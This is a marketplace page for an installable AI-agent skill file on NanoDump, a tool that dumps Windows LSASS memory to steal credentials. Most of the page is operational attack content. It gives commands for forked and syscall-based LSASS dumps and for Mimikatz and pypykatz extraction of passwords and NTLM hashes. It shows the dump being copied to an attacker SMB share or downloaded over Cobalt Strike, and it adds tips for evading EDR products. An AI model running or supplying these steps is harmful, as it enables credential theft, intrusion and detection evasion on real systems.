aeondave/nanodump
offensive-tools/windows/nanodump/SKILL.md
Auth/lab ref: NanoDump LSASS acquisition research; handle, fork, minidump, BOF/DLL formats, Windows lab validation and detection evidence.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill nanodumpInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Jun 9, 2026, 3:57 AM124.1s1 file scanned
SKILL.md
- name:
- nanodump
- description:
- Auth/lab ref: NanoDump LSASS acquisition research; handle, fork, minidump, BOF/DLL formats, Windows lab validation and detection evidence.
- license:
- MIT
- compatibility:
- Windows x64; EXE/BOF/DLL formats.
- author:
- AeonDave
- version:
- 1.0
nanodump
Stealthy LSASS minidump tool — syscalls + fork-based techniques to bypass modern EDR solutions.
Concept
nanodump creates a minidump of the LSASS process using:
- Direct syscalls (avoids hooked ntdll APIs)
- Fork + minidump (dumping LSASS fork, not LSASS itself)
- Handle duplication (uses existing handles)
- Elevated handles from another process
- Silent process exit technique
The resulting .dmp can be parsed with Mimikatz offline.
Quick Start
# Basic dump via LSASS fork (most stealthy)
nanodump.exe --fork --write C:\Windows\Temp\lsass.dmp
# Dump with write to file via syscall
nanodump.exe --write C:\Windows\Temp\lsass.dmp
# BOF usage in Cobalt Strike
inline-execute nanodump.o --fork --write lsass.dmp
Core Flags
| Flag | Description |
|------|-------------|
| --write <path> | Write dump to file path |
| --fork | Fork LSASS before dumping (stealth) |
| --snapshot | Use process snapshot (NtCreateProcessEx) |
| --dup | Duplicate LSASS handle from another process |
| --elevate-handle | Elevate handle via existing handle in another proc |
| --silent-process-exit | Use SilentProcessExit to dump |
| --pid <n> | Specify LSASS PID manually |
| --sec-logon | Use secondary logon handle |
| --malseclogon | Abuse MalSecLogon technique |
| --help | Show all options |
Post-Dump: Credential Extraction
# Transfer dump to Linux and parse with pypykatz
pypykatz lsa minidump lsass.dmp
# Parse on Windows with Mimikatz
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords
# Extract NTLM hashes only
pypykatz lsa minidump lsass.dmp -o hashes.txt
Common Workflows
# Stealthiest: fork + write to temp
nanodump.exe --fork --write C:\Windows\Temp\lsass.dmp
# Transfer dump to attacker
# Via Cobalt Strike: download C:\Windows\Temp\lsass.dmp
# Via SMB: copy lsass.dmp \\attacker\share\
# Parse on Kali
pypykatz lsa minidump lsass.dmp
# Use in CS as BOF
inline-execute nanodump.o --fork --write lsass.dmp
download lsass.dmp
Detection Evasion Notes
--forkavoids direct LSASS access — EDR sees fork process, not LSASS dump- Direct syscalls bypass user-mode API hooks (CrowdStrike, Defender ATP)
- Combine with process masquerading for additional evasion
- Avoid writing to predictable paths (
C:\Windows\Temp\lsass.dmpis monitored)
Resources
| File | When to load |
|------|--------------|
| references/lsass-techniques.md | All LSASS dump techniques, pypykatz parsing, hash extraction, detection landscape |
Structuring This Skill
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026